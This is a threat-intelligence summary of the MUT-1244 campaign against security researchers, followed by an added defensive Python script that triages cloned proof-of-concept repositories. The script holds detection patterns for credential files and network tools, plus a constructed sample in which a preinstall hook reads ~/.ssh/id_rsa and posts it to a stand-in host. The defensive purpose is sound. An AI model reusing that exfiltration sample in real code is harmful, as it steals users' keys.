Getting a taste of your own medicine: Threat actor MUT-1244 targets offensive actors, leaking hundreds of thousands of credentials
ID: f86ad686-3a1c-5e1d-8476-4f665cd4e672
STIX ID: report--f86ad686-3a1c-5e1d-8476-4f665cd4e672
Feed Name: Datadog Security Labs
Datadog Security Labs details an active campaign, attributed to the threat actor MUT-1244, that targets security researchers and offensive actors through two delivery paths: a phishing lure posing as a "kernel upgrade" and dozens of trojanized GitHub proof-of-concept repositories (plus a malicious npm package). Both paths deliver the same second-stage payload (xmrdropper or a related dropper), which backdoors the host and exfiltrates sensitive artifacts; confirmed victims had SSH keys, AWS keys and shell command histories stolen. The actor also exfiltrated over 390,000 credentials, believed to be WordPress credentials, to cloud services, and dozens of machines remained actively infected at the time of reporting.
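The practical lesson of the summary is that a proof-of-concept repository or npm package should be triaged before it is installed or run. The script below is an added example written for this page, not code from the Datadog report or from the actor's tooling. It checks for the two things the summary describes: npm lifecycle hooks that execute automatically on `npm install`, and source files that both reference the credential stores the dropper is reported to steal (SSH keys, AWS credentials, shell history) and make an outbound network call. The regex patterns, the `triage` verdict wording and the sample repository it builds in a temporary directory are constructed for illustration and are not indicators from the report.

```python
"""Pre-install triage for a cloned proof-of-concept repository (added example)."""
from __future__ import annotations

import json
import re
import tempfile
from pathlib import Path

# npm lifecycle hooks that run automatically during `npm install` (real npm hook names).
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Credential stores named in the campaign summary; the regex itself is an assumption.
CREDENTIAL_PATHS = re.compile(r"\.ssh/|\.aws/credentials|\.bash_history|\.zsh_history")

# Crude outbound-network hints (assumed list, extend for the languages you review).
NETWORK_CALLS = re.compile(r"\b(curl|wget|fetch|requests\.(post|get)|urlopen|http\.request)\b")

SOURCE_SUFFIXES = {".py", ".sh", ".js", ".c", ".h", ".go", ".rb", ".pl"}


def lifecycle_scripts(repo: Path) -> dict[str, str]:
    """Return every auto-run npm hook declared in any package.json under repo."""
    found: dict[str, str] = {}
    for pkg in repo.rglob("package.json"):
        try:
            scripts = json.loads(pkg.read_text()).get("scripts", {})
        except (json.JSONDecodeError, OSError):
            continue
        for hook in LIFECYCLE_HOOKS:
            if hook in scripts:
                found[f"{pkg.relative_to(repo)}:{hook}"] = scripts[hook]
    return found


def scan_sources(repo: Path) -> dict[str, dict[str, list[int]]]:
    """Per source file: line numbers touching credential stores and making network calls."""
    report: dict[str, dict[str, list[int]]] = {}
    for path in repo.rglob("*"):
        if not path.is_file() or path.suffix not in SOURCE_SUFFIXES:
            continue
        try:
            lines = path.read_text(errors="replace").splitlines()
        except OSError:
            continue
        creds = [n for n, line in enumerate(lines, 1) if CREDENTIAL_PATHS.search(line)]
        net = [n for n, line in enumerate(lines, 1) if NETWORK_CALLS.search(line)]
        if creds or net:
            report[str(path.relative_to(repo))] = {"credential_refs": creds, "network_calls": net}
    return report


def triage(repo: Path) -> dict:
    """Combine the two checks into a verdict; a file that reads credentials and talks out is an exfil candidate."""
    hooks = lifecycle_scripts(repo)
    sources = scan_sources(repo)
    exfil = sorted(f for f, r in sources.items() if r["credential_refs"] and r["network_calls"])
    if hooks and exfil:
        verdict = "do not install: auto-run hook plus credential exfil pattern"
    elif hooks or exfil:
        verdict = "suspicious: review before running"
    else:
        verdict = "no obvious hooks or exfil patterns"
    return {"lifecycle_hooks": hooks, "sources": sources, "exfil_candidates": exfil, "verdict": verdict}


def build_sample_repo() -> Path:
    """Constructed lookalike of a trojanized PoC repo for the demo (not a real sample)."""
    root = Path(tempfile.mkdtemp(prefix="poc-"))
    (root / "package.json").write_text(json.dumps({
        "name": "cve-poc",
        "scripts": {"preinstall": "node setup.js", "test": "echo ok"},
    }))
    (root / "setup.js").write_text(
        'const fs = require("fs");\n'
        'const key = fs.readFileSync(process.env.HOME + "/.ssh/id_rsa");\n'
        'fetch("https://example.invalid/upload", {method: "POST", body: key});\n'
    )
    (root / "exploit.py").write_text("import sys\nprint('harmless PoC')\n")
    return root


if __name__ == "__main__":
    print(json.dumps(triage(build_sample_repo()), indent=2))
```

Run it against a freshly cloned repository with `triage(Path("/path/to/clone"))` before `npm install`, `pip install -e .` or `make`. The scan is deliberately line-based and will miss obfuscated or base64-packed payloads, so treat a clean result as "nothing obvious", not as a clearance; the hook check is the more reliable of the two because npm will run those scripts no matter how the payload is hidden.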
